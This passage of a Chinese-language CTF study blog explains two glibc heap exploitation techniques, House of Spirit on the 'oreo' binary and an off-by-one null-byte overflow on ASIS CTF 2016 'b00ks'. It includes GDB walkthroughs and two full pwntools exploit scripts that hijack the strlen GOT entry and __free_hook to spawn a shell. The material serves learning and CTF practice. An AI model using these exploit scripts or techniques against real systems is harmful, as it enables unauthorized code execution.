<p>首先每创建一个堆快就会把dword_804A2A4的值加1，而这个位置相当于我们在0x804A2A0伪造的chunk的size值，因为我们创建的chunk是0x40大小的，所以我们得先创建0x40个chunk把这里的值改成0x40，因为这里我们伪造的chunk的size位是0x804A2A4。注意这里创建的chunk的每个前项指针得设置成NULL，这样在free的时候就不会把依次free所有的chunk了。</p>
<p>然后还需要绕过一个检查：</p>
<p>·    fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av-&gt;system_mem 。</p>
<p>这里我们利用leave函数的功能进行绕过，这个选项是在0x0804a2c0处开始修改，得修改伪造的chunk的下一个size位为合适的大小</p>
<ol start="4">
<li>成功free后，我们下一次申请的内存地址就会从 0x0804a2a8开始了，然后把这个地方改为strlen的got表，调用leave选项的函数，这里修改完后就会直接调用strlen函数，相当于system（输入的内容），所以这里要用system的地址+’;bin/sh’，用来拿到shell，用分号是分开调用，这里实际会调用system（system地址）+system（bin/sh）</li>
</ol>
<h2 id="gdb调试-2"><a class="markdownIt-Anchor" href="#gdb调试-2"></a> Gdb调试</h2>
<p>首先创建4个chunk进行实验，可以看到0x0804a2a8的位置存储的是0x0804a2c0，0x0804a2a4位置存储的是4。</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112835587.png" srcset="/img/loading.gif" lazyload alt="image-20210802112835587" style="zoom:80%;">
<p>查看一个chunk，可以看到和我们猜测的结构一致</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112903550.png" srcset="/img/loading.gif" lazyload alt="image-20210802112903550" style="zoom:80%;">
<p>使用leave功能，可以看到输入的内容存放在了0x804a2c0的位置</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112917060.png" srcset="/img/loading.gif" lazyload alt="image-20210802112917060" style="zoom:80%;">
<p>开始时利用name的溢出把第一个申请的chunk的前项指针覆盖成put的got表地址</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802113023666.png" srcset="/img/loading.gif" lazyload alt="image-20210802113023666" style="zoom:80%;">
<p>创建40个chunk，然后用leave写入0x804a2c0伪造fastbin的内存情况</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802113036589.png" srcset="/img/loading.gif" lazyload alt="image-20210802113036589" style="zoom:80%;">
<p>Free之后成功把0x804a2a0的内存地址放入了fastbin</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802113049179.png" srcset="/img/loading.gif" lazyload alt="image-20210802113049179" style="zoom:80%;">
<h3 id="payload脚本"><a class="markdownIt-Anchor" href="#payload脚本"></a> Payload脚本</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># encoding=UTF-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>context.binary = <span class="hljs-string">&quot;./oreo&quot;</span><br>oreo = ELF(<span class="hljs-string">&quot;./oreo&quot;</span>)<br><span class="hljs-keyword">if</span> args[<span class="hljs-string">&#x27;REMOTE&#x27;</span>]:<br>    p = remote(ip, port)<br><span class="hljs-keyword">else</span>:<br>    p = process(<span class="hljs-string">&quot;./oreo&quot;</span>)<br>log.info(<span class="hljs-string">&#x27;PID: &#x27;</span> + <span class="hljs-built_in">str</span>(proc.pidof(p)[<span class="hljs-number">0</span>]))<br>libc = ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">descrip, name</span>):</span><br>    p.sendline(<span class="hljs-string">&#x27;1&#x27;</span>)<br>    p.sendline(name)<br>    p.sendline(descrip)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show_rifle</span>():</span><br>    p.sendline(<span class="hljs-string">&#x27;2&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&#x27;===================================\n&#x27;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">order</span>():</span><br>    p.sendline(<span class="hljs-string">&#x27;3&#x27;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leave</span>(<span class="hljs-params">notice</span>):</span><br>    p.sendline(<span class="hljs-string">&#x27;4&#x27;</span>)<br>    p.sendline(notice)<br><br>name = <span class="hljs-number">27</span> * <span class="hljs-string">&#x27;a&#x27;</span> + p32(oreo.got[<span class="hljs-string">&#x27;puts&#x27;</span>])<br><span class="hljs-built_in">print</span> <span class="hljs-built_in">hex</span>(oreo.got[<span class="hljs-string">&#x27;puts&#x27;</span>])<br>add(<span class="hljs-number">25</span> * <span class="hljs-string">&#x27;a&#x27;</span>, name)<br><span class="hljs-comment">#gdb.attach(p)</span><br>show_rifle()<br>p.recvuntil(<span class="hljs-string">&#x27;===================================\n&#x27;</span>)<br>p.recvuntil(<span class="hljs-string">&#x27;Description: &#x27;</span>)<br>puts_addr = u32(p.recvuntil(<span class="hljs-string">&#x27;\n&#x27;</span>)[:<span class="hljs-number">4</span>])<br>libc_base = puts_addr - libc.symbols[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>system_addr = libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br><span class="hljs-comment">#创建0x40个堆快把0x804A2A4伪造chunk的size值</span><br>chunk = <span class="hljs-number">1</span><br><span class="hljs-keyword">while</span> chunk &lt; <span class="hljs-number">0x40</span>-<span class="hljs-number">1</span>:<br>    add(<span class="hljs-number">25</span> * <span class="hljs-string">&#x27;a&#x27;</span>, <span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">27</span> + p32(<span class="hljs-number">0</span>))<br>    chunk += <span class="hljs-number">1</span><br><span class="hljs-comment">#最后一个chunk把上一个chunk地址位置改成0x0804a2a8</span><br>payload = <span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">27</span> + p32(<span class="hljs-number">0x0804a2a8</span>)<br>add(<span class="hljs-number">25</span> * <span class="hljs-string">&#x27;a&#x27;</span>, payload)<br><span class="hljs-comment">#满足伪造fastbin的fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av-&gt;system_mem 条件</span><br>payload = <span class="hljs-number">0x20</span> * <span class="hljs-string">&#x27;\x00&#x27;</span> + p32(<span class="hljs-number">0x0</span>) + p32(<span class="hljs-number">0x88</span>)<br>leave(payload)<br>order()<br>p.recvuntil(<span class="hljs-string">&#x27;Okay order submitted!\n&#x27;</span>)<br><br>payload = p32(oreo.got[<span class="hljs-string">&#x27;strlen&#x27;</span>])<br>add(payload, <span class="hljs-string">&#x27;b&#x27;</span> * <span class="hljs-number">20</span>)<br><span class="hljs-comment">#gdb.attach(p)</span><br>leave(p32(system_addr) + <span class="hljs-string">&#x27;;/bin/sh\x00&#x27;</span>)<br><br>p.interactive()<br><br><br></code></pre></td></tr></table></figure>
<h1 id="实验十一-off-by-one-漏洞基于堆"><a class="markdownIt-Anchor" href="#实验十一-off-by-one-漏洞基于堆"></a> 实验十一-Off-By-One 漏洞（基于堆）</h1>
<h2 id="漏洞原理-3"><a class="markdownIt-Anchor" href="#漏洞原理-3"></a> 漏洞原理</h2>
<p>off-by-one 是指单字节缓冲区溢出，这种漏洞的产生往往与边界验证不严和字符串操作有关，当然也不排除写入的 size 正好就只多了一个字节的情况。其中边界验证不严通常包括</p>
<ul>
<li>使用循环语句向堆块中写入数据时，循环的次数设置错误（这在 C 语言初学者中很常见）导致多写入了一个字节。</li>
<li>字符串操作不合适</li>
</ul>
<p>一般来说，单字节溢出被认为是难以利用的，但是因为 Linux 的堆管理机制 ptmalloc 验证的松散性，基于 Linux 堆的 off-by-one 漏洞利用起来并不复杂，并且威力强大。</p>
<p>off-by-one 利用思路</p>
<p>1.溢出字节为可控制任意字节：通过修改大小造成块结构之间出现重叠，从而泄露其他块数据，或是覆盖其他块数据。也可使用 NULL 字节溢出的方法</p>
<p>2.溢出字节为 NULL 字节：在 size 为 0x100 的时候，溢出 NULL 字节可以使得 prev_in_use 位被清，这样前块会被认为是 free 块。（1） 这时可以选择使用 unlink 方法（见 unlink 部分）进行处理。（2） 另外，这时 prev_size 域就会启用，就可以伪造 prev_size ，从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的大小与prev_size 是否一致。<strong>（<strong><strong>glibc2.28</strong></strong>前版本有效）</strong></p>
<p>下面是ctf例题：</p>
<h2 id="asis-ctf-2016-b00ks"><a class="markdownIt-Anchor" href="#asis-ctf-2016-b00ks"></a> Asis CTF 2016 b00ks</h2>
<h3 id="程序分析-3"><a class="markdownIt-Anchor" href="#程序分析-3"></a> 程序分析</h3>
<p>该程序是64位，开启了nx和pie，注意这里开启了Full RELRO保护，不能进行复写got表的操作，需要考虑劫持之类的操作</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115028455.png" srcset="/img/loading.gif" lazyload alt="image-20210802115028455" style="zoom:80%;">
<p>主函数如下</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115046771.png" srcset="/img/loading.gif" lazyload alt="image-20210802115046771" style="zoom:80%;">
<p>有几个功能，增，删，改，查看，还有个修改authorname的功能，<strong>这个函数在一开始就会调用一次</strong>，而我们的漏洞点就是出在这里。函数内部如下</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115104551.png" srcset="/img/loading.gif" lazyload alt="image-20210802115104551" style="zoom:80%;">
<p>sub_9f5内容</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115119997.png" srcset="/img/loading.gif" lazyload alt="image-20210802115119997" style="zoom:67%;">
<p>可以看到是把我们的输入一个个进行读取，但是这里有一个漏洞，如果我们输入的是32个字节，因为循环是从0开始，当到31的时候我们输入的读取就已经结束了，但是循环还会继续一次，最后会把*buf的第33位置为\x00，这就是off by one的null字节溢出。</p>
<p>新建book的函数</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115140653.png" srcset="/img/loading.gif" lazyload alt="image-20210802115140653" style="zoom:80%;">
<p>要求输入一个name和一个description，name的大小说是最大为32，但是实际上这里并没有检查，可以创建我们想要的大小，description也一样。</p>
<p>Name和description创建完后还会创建一个结构体用来存储book的指针</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115429476.png" srcset="/img/loading.gif" lazyload alt="image-20210802115429476" style="zoom:80%;">
<p>这个结构体大概内容是</p>
<p>0x0 book的id</p>
<p>0x8 book的name的地址</p>
<p>0x10 book的description的地址</p>
<p>0x18 book的size</p>
<p>然后会把这个结构体的指针放在*((_QWORD *)off_202010 + v2)的位置，这个位置实际上就是author_name(off_202018)的位置+0x20的地方，也就是说如果输入了32个字节的author_name，那么最后的\x00就会覆盖到第一个创建的book的低地址。</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115447627.png" srcset="/img/loading.gif" lazyload alt="image-20210802115447627" style="zoom:80%;">
<p>删除函数</p>
<img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802115530189.png" srcset="/img/loading.gif" lazyload alt="image-20210802115530189" style="zoom:80%;">
<p>编辑函数，根据off_202010位置存放的结构体指针进行编辑</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809144352252.png" srcset="/img/loading.gif" lazyload alt="image-20210809144352252" style="zoom:80%;">
<p>展示book的函数，这里还会把author_name展示出来</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809144405729.png" srcset="/img/loading.gif" lazyload alt="image-20210809144405729" style="zoom:80%;">
<p>选项5是和开头一样的修改author_name的函数，就不再展示</p>
<h3 id="利用思路-3"><a class="markdownIt-Anchor" href="#利用思路-3"></a> 利用思路</h3>
<p>1.首先因为author_name紧接着就是book1结构体的地址，如果溢出了一个\x00就会覆盖到book1的结构体地址，，这个后面会用到，因为我们是先输入的name，那么如果先输入32字节的name，再创建book1的话，book1的地址就会覆盖name末尾的截断字符，如果选择5输出了author_name的话，就可以输出book1的地址了。</p>
<p>2.<strong>libc****基址泄露方法</strong></p>
<p>因为题目开启了pie，而且没有特别明显的libc基址泄露，但是这里有一个技巧，如果我们申请的内存块足够大，就会调用mmap来扩展内存，由于调用mmap分配的内存和libc基址的偏移是固定的，我们只要泄露book2分配内存的地址就可以知道libc基址</p>
<p>验证：这里创建book2申请了2个大小0x21000的空间</p>
<p>选择Book2的name存储的地址是  0x00007f9899a27010，libc加载的基址是</p>
<p>0x00007f9899475000，偏移为0x00007f9899a27010-0x00007f9899475000=0x5b2010</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809144439572.png" srcset="/img/loading.gif" lazyload alt="image-20210809144439572" style="zoom:80%;">
<p>第二次申请的结果</p>
<p>Name的内存地址是0x00007f4a27340010，libc基址是0x00007f4a26d8e000，偏移为0x00007f4a27340010-0x00007f4a26d8e000=0x5b2010，可以看到2次申请偏移是一样的</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809144457875.png" srcset="/img/loading.gif" lazyload alt="image-20210809144457875" style="zoom:80%;">
<p>可以看到这里偏移是一样的</p>
<p>3.<strong>泄露book2****地址的方法</strong></p>
<p>这里可以利用off by one的漏洞，因为我们的选项5可以重新修改一开始设置的author_name，然后让末尾的\x00覆盖掉book1的结构体指针（这里要注意，我们可以修改的区域是book1的name和description，创建book1的时候要让这两个区域能修改到覆盖后的book1的结构体指针），这样就可以在这个区域伪造一个fake chunk，把name和description的指针修改为book2结构体指针的name和description的地址（由于每次申请的结构体是0x20，所以可以通过泄露的book1结构体的地址进行计算），就可以利用printf选项打印出book2申请的name和description的地址了，然后利用这个地址计算libc的基址。</p>
<p>4.<strong>拿到shell</strong></p>
<p>这里需要利用__free_hook函数，<strong>当调用<strong><strong>free</strong></strong>函数的时候__free_hook<strong><strong>函数不为NULL</strong></strong>会优先调用__free_hook****里面所写的内容</strong>，我们可以利用编辑功能把book2的结构体中指向description的指针修改为__free_hook函数，再利用编辑功能编辑book2，修改__free_hook的内容为onegadget的execve(&quot;/bin/sh&quot;, rsp+0x30, environ)，然后执行free book2，当free了book2的description指针的时候就会执行__free_hook里的内容拿到shell。</p>
<h3 id="gdb调试-3"><a class="markdownIt-Anchor" href="#gdb调试-3"></a> Gdb调试</h3>
<p>验证输入author_name的off by one</p>
<p>首先在一开始输入author_name的时候输入32个A，然后创建book1和book2，这里需要用到find命令寻找A存储的地方</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809144526836.png" srcset="/img/loading.gif" lazyload alt="image-20210809144526836" style="zoom:80%;">
<p>可以看到book1的地址覆盖了author_name末尾的\x00</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145420604.png" srcset="/img/loading.gif" lazyload alt="image-20210809145420604" style="zoom:80%;">
<p>这时候选择打印功能就会输出book1结构体的内容了</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145450859.png" srcset="/img/loading.gif" lazyload alt="image-20210809145450859" style="zoom:80%;">
<p>然后再次选择修改author_name输入32个A导致了book1结构体地址末尾被覆盖成了\x00（这里重新调试了，可以看到如果分配的内存大小固定的话，重新调试末尾的地址是一样的）</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145520725.png" srcset="/img/loading.gif" lazyload alt="image-20210809145520725" style="zoom:80%;">
<p>这里查看分配的堆快，我们需要把description的区域分配到能够控制到覆盖后的（这里是0x559595831100）的地方，就可以伪造book1结构体的chunk了</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145539011.png" srcset="/img/loading.gif" lazyload alt="image-20210809145539011" style="zoom:80%;">
<p>这里编辑book1的description+0x20的偏移就可以编辑到通过off by one 覆盖的0x559595831100的地方进行伪造chunk了（注意这里需要之前创建description有足够的大小）</p>
<p>然后伪造book1的结构体把name和description的位置写入book2的name和description的结构体指针的地址(相对book1结构体地址的偏移为0x38和0x40)</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145655945.png" srcset="/img/loading.gif" lazyload alt="image-20210809145655945" style="zoom:80%;">
<p>再次选择打印就会打印出book2通过mmap分配的内存的地址了</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145720528.png" srcset="/img/loading.gif" lazyload alt="image-20210809145720528" style="zoom:80%;">
<p>之后的利用就和利用思路一样，利用编辑功能把book2的结构体（这里是伪造book1的description）中指向description的指针修改为__free_hook函数，再利用编辑功能编辑book2，修改__free_hook的内容为onegadget的execve(&quot;/bin/sh&quot;, rsp+0x30, environ)，然后执行free book2，当free了book2的description指针的时候就会执行__free_hook里的内容拿到shell。</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210809145752158.png" srcset="/img/loading.gif" lazyload alt="image-20210809145752158" style="zoom:80%;">
<h3 id="payload脚本-2"><a class="markdownIt-Anchor" href="#payload脚本-2"></a> Payload脚本</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># encoding=UTF-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>binary=ELF(<span class="hljs-string">&quot;b00ks&quot;</span>)<br>libc=ELF(<span class="hljs-string">&quot;/lib/x86_64-linux-gnu/libc-2.23.so&quot;</span>)<br>p=process(<span class="hljs-string">&quot;./b00ks&quot;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">new</span>(<span class="hljs-params">name_size,name,des_size,des</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;&gt; &quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;1&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(name_size))<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(name)<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(des_size))<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(des)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">printbook</span>():</span><br>    p.recvuntil(<span class="hljs-string">&quot;&gt; &quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;4&quot;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">read_authorname</span>(<span class="hljs-params">name</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;&gt; &quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;5&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(name)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">editbook</span>(<span class="hljs-params">book_id,new_des</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;&gt; &quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;3&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.writeline(<span class="hljs-built_in">str</span>(book_id))<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(new_des)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span>(<span class="hljs-params">book_id</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;&gt; &quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;2&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(book_id))<br><br>p.recvuntil(<span class="hljs-string">&quot;name: &quot;</span>)<br>p.sendline(<span class="hljs-string">&quot;A&quot;</span>*<span class="hljs-number">32</span>)<br><span class="hljs-comment">#需要创建满足book1的des区域可以修改到通过off by one修改后的内存区域</span><br>new(<span class="hljs-number">176</span>,<span class="hljs-string">&quot;a&quot;</span>,<span class="hljs-number">88</span>,<span class="hljs-string">&quot;a&quot;</span>)<br><br><span class="hljs-comment">#创建2个大的内存区域，使用mmap分配</span><br>new(<span class="hljs-number">0x21000</span>,<span class="hljs-string">&quot;a&quot;</span>,<span class="hljs-number">0x21000</span>,<span class="hljs-string">&quot;a&quot;</span>)<br><br><span class="hljs-comment">#gdb.attach(p)</span><br>printbook()<br>p.recvuntil(<span class="hljs-string">&quot;Author: &quot;</span>)<br>book1_addr=u64(p.recvline()[<span class="hljs-number">32</span>:<span class="hljs-number">32</span>+<span class="hljs-number">6</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>log.success(<span class="hljs-string">&quot;book1_address:&quot;</span>+<span class="hljs-built_in">hex</span>(book1_addr))<br><br><span class="hljs-comment">#伪造fake chunk</span><br>payload=<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x20</span>+p64(<span class="hljs-number">1</span>)+p64(book1_addr+<span class="hljs-number">0x38</span>)+p64(book1_addr+<span class="hljs-number">0x40</span>)+p64(<span class="hljs-number">0xffff</span>)<br>editbook(<span class="hljs-number">1</span>,payload)<br><span class="hljs-comment">#gdb.attach(p)</span><br>read_authorname(<span class="hljs-string">&quot;A&quot;</span>*<span class="hljs-number">32</span>)<br><span class="hljs-comment">#gdb.attach(p)</span><br><br>printbook()<br>p.recvuntil(<span class="hljs-string">&quot;Name: &quot;</span>)<br>book2_name_addr=u64(p.recvline()[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&quot;\x00&quot;</span>))<br>p.recvuntil(<span class="hljs-string">&quot;Description: &quot;</span>)<br>book2_des_addr=u64(p.recvline()[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&quot;\x00&quot;</span>))<br>log.success(<span class="hljs-string">&quot;book2 name addr:&quot;</span>+<span class="hljs-built_in">hex</span>(book2_name_addr))<br>log.success(<span class="hljs-string">&quot;book2 des addr:&quot;</span>+<span class="hljs-built_in">hex</span>(book2_des_addr))<br><br><span class="hljs-comment">#用book2的name和des到libc基址的偏移计算libc基址</span><br>libc_base=book2_name_addr-<span class="hljs-number">0x5b2010</span><br>log.success(<span class="hljs-string">&quot;libc base:&quot;</span>+<span class="hljs-built_in">hex</span>(libc_base))<br><span class="hljs-comment">#gdb.attach(p)</span><br>free_hook=libc_base+libc.symbols[<span class="hljs-string">&quot;__free_hook&quot;</span>]<br>one_gadget=libc_base+<span class="hljs-number">0x4527a</span> <br>log.success(<span class="hljs-string">&quot;free_hook:&quot;</span>+<span class="hljs-built_in">hex</span>(free_hook))<br>log.success(<span class="hljs-string">&quot;one_gadget:&quot;</span>+<span class="hljs-built_in">hex</span>(one_gadget))<br><br><span class="hljs-comment">#修改book2的des为free_hook的地址，然后把内容改为one_gadget</span><br>editbook(<span class="hljs-number">1</span>,p64(free_hook))<br>editbook(<span class="hljs-number">2</span>,p64(one_gadget))<br><span class="hljs-comment">#gdb.attach(p)</span><br><span class="hljs-comment">#进行free的操作调用free_hook劫持</span><br><br>delete(<span class="hljs-number">2</span>)<br>p.interactive()<br><br></code></pre></td></tr></table></figure>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/PWN%E5%AD%A6%E4%B9%A0/">PWN学习</a>
                    
                      <a class="hover-with-bg" href="/categories/PWN%E5%AD%A6%E4%B9%A0/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/PWN%E5%AD%A6%E4%B9%A0/">PWN学习</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
